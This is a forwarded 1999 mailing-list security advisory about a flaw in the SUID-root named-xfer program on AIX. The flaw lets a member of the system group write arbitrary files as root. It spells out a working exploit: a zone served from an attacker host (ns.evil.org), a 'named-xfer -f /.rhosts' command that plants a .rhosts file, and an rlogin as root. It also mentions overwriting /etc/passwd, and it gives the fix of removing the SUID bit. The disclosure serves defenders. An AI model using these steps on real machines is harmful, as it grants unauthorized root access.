Date: Thu, 23 Sep 1999 11:57:32 -0400
From: Kyle Amon <amonk@GNUTEC.COM.>
To: [email protected]Subject: named-xfer hole on AIX (fwd)
Aleph,
I thought I posted this to the list almost two years ago, but I never saw
it show up and it hasn't turned up in any of the usual archives of such
things. I didn't bother to save a copy so I just figured, oh well. It
turns out a friend that I sent it to saved a copy, so here it is again
(below) for the sake of posterity.
- Kyle
Kyle Amon email: [email protected]
url: http://www.gnutec.com/~amonk
KeyID 1024/26DD13D9
Fingerprint = 7D 86 D1 AE 4B E9 91 6A 4B BC B5 B4 12 F0 D3 1A
________ _______ ________ ________ __ __
/ ______/ / ____ \ / ______/ / ______/ / \ / /
/ /_____ / /____/ / / /_____ / /_____ / /\ \/ /
/ ______/ / __ ___/ / ______/ / ______/ /_/ \__/
/ / / / \ \ / /_____ / /_____ ________
/_/ /_/ \_\ /_______/ /_______/ / ____ /
__ __ _______ __ __ ______ __ / /___/ / __
/ / _/_/ / _____/ / / / / /_ __/ /\ / / /_______/ / \
/ /_/_/ / /____ / / / / / / / \ / / __ __ | |
/ _ / / _____/ / / _/_/ / / / /\ \/ / / /_ / / \/
/ / \ \ / /____ \ \_/_/ __/ /_ / / \ / ( (/_\/ /
/_/ \_\ /______/ \__/ /_____/ /_/ \/ \_/ \_/ ()
A man denied legal counsel, held without bail or trial, is a political
prisoner in any country, especially the United States of America!
http://www.kevinmitnick.comhttp://www.2600.com/kevin
Petition to Microsoft Corporation for Open Source Consumer Windows!
http://www.linuxresources.com/linuxreview/petition.html
---------- Forwarded message ----------
Date: Thu, 18 Feb 1999 22:08:12 -0500 (EST)
From: Cherie Earnest <cherie@gnutec.com.>
To: Kyle Amon <amonk@gnutec.com.>
Subject: named-xfer hole on AIX (fwd)
---------- Forwarded message ----------
Date: Thu, 8 Jan 1998 07:58:48 -0500 (EST)
From: [email protected]
To: [email protected]Subject: named-xfer hole on AIX (fwd)
Friends, Romans, Geeks,
I don't know if anyone's noticed this before, but if so I ain't heard
about it so here goes nuthin... :-)
On AIX, named-xfer has the following permissions...
-r-sr-xr-- 1 root system 32578 Feb 18 1997 /usr/sbin/named-xfer
which of course means that only root and members of the system group have
execute permission but that (since the SUID bit is set) it executes as
root even when run by non-root members of the system group. So, although
one would have to already be a member of the system group (or manage to
obtain such status) in order to exploit the problem described here, it's
still a rather significant problem. And its much worse than the old
sendmail -C problem which was still exploitable in AIX up until very
recently when one was a member of the system group. The big difference
here being that sendmail -C only let one read files they shouldn't have
been able to read whereas this problem lets one write them :-).
The problem is that named-xfer writes it's resulting zone file (when using
the -f option) without (or at least before) relinquishing it's root
privilege (and I doubt it ever relinquishes it since it doesn't really
need it in the first place).
So, for example, if one were to set up a zone at ns.evil.org in the
following manner...
putting this in the named.boot file...
primary + db.hack
and giving db.hack contents as follows...
@ IN SOA evil.org. nsa.evil.org. (
666 ; Serial
10800 ; Refresh
3600 ; Retry
3600000 ; Expire
86400 ) ; Minimum TTL
then run a command like this on some victim AIX machine...
named-xfer -z + -f /.rhosts ns.evil.org
they will put this file in root's home directory... :-)
-rw-r--r-- 1 root system 155 Jan 8 03:52 .rhosts
with contents of this... :-)
; zone '+' last serial 0
; from 10.10.10.10 at Thu Jan 8 03:52:19 1998
$ORIGIN .
+ IN SOA evil.org. nsa.evil.org. (
666 10800 3600 3600000 86400 )
All they need do then is create a user like this (anywhere)...
IN:!:666:1::/home/IN:/bin/ksh
and login or su to it then rlogin to victim AIX machine as root! :-)
Isn't that special?
So now we have reason number 9999 not to run the BSD "r" commands on
our machines. And as I'm sure you all know, this is but one semi-creative
use for this. I'm sure the gentle reader will be able to come up with
a handfull of others... and the not so gentle reader will immediately see
possibilities for overwriting the /etc/passwd file or the kernel. :-(
Now, lest you think me a true cad, the simple fix is that the damn thing
doesn't need it's SUID bit set in order to work (why it comes with it on,
I couldn't imagine). So, check yer boxes boys n girls and dump this here
bit from this here program. :-)
Best Regards,
Kyle
P.S. I only verified this on AIX 4.1.5 and 4.2.1 but it is likely a
pervasive problem.
Kyle Amon email: [email protected]
Unix Systems Administrator phone: (203) 486-3290
Security Specialist pager: 1-800-759-8888 PIN 1616512
IBM Global Services or [email protected]
email: [email protected]
url: http://www.gnutec.com/kyle
KeyID 1024/173D96C9
Fingerprint = 90 4F 0B D4 2D 37 E7 61 1A 31 7B F2 72 04 66 1A
Windows 95: A 32-bit patch for a 16-bit GUI shell running on top of an
8-bit operating system written for a 4-bit processor by a
2-bit company who cannot stand 1 bit of competition.
